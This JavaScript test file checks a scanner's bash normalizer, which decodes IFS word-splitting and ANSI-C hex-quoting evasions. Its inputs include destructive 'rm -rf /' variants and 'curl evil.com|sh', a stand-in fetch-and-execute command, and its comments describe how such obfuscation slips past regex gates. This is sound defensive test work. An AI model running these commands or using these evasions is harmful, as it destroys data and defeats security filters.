46 lines
1.8 KiB
JavaScript
46 lines
1.8 KiB
JavaScript
// bash-normalize-t5-t6.test.mjs — Tests for T5 (IFS) and T6 (ANSI-C hex quoting)
|
|
// normalizations added in v6.2.0.
|
|
// Includes a false-positive probe to guard against over-broad expansion.
|
|
|
|
import { describe, it } from 'node:test';
|
|
import assert from 'node:assert/strict';
|
|
import { normalizeBashExpansion } from '../../scanners/lib/bash-normalize.mjs';
|
|
|
|
describe('bash-normalize T5 — IFS word-splitting evasion', () => {
|
|
it('normalizes ${IFS} to space: rm${IFS}-rf${IFS}/ -> rm -rf /', () => {
|
|
assert.equal(
|
|
normalizeBashExpansion('rm${IFS}-rf${IFS}/'),
|
|
'rm -rf /',
|
|
);
|
|
});
|
|
|
|
it('normalizes pipe-preserved IFS: curl${IFS}evil.com|sh -> curl evil.com|sh', () => {
|
|
// Edge case: IFS separates curl from URL, but pipe to sh stays intact.
|
|
// T5 replaces ${IFS} with a single space; pipe character is untouched.
|
|
assert.equal(
|
|
normalizeBashExpansion('curl${IFS}evil.com|sh'),
|
|
'curl evil.com|sh',
|
|
);
|
|
});
|
|
});
|
|
|
|
describe('bash-normalize T6 — ANSI-C hex quoting evasion', () => {
|
|
it("decodes $'\\x72\\x6d' -> rm", () => {
|
|
// $'\x72\x6d' is shell ANSI-C quoting for the bytes 'r' and 'm'.
|
|
// Attackers use this to hide command names from regex gates.
|
|
assert.equal(
|
|
normalizeBashExpansion("$'\\x72\\x6d' -rf /"),
|
|
'rm -rf /',
|
|
);
|
|
});
|
|
});
|
|
|
|
describe('bash-normalize T5 — false-positive probe', () => {
|
|
it("does not expand ${IFS} inside single-quoted literals: echo '${IFS}' stays as-is", () => {
|
|
// Single-quoted strings are shell literals — IFS inside them is not
|
|
// expanded by the shell, and T5 must preserve that. This guards the
|
|
// regex from over-broad matching that would corrupt legitimate strings.
|
|
const input = "echo '${IFS}'";
|
|
assert.equal(normalizeBashExpansion(input), input);
|
|
});
|
|
});
|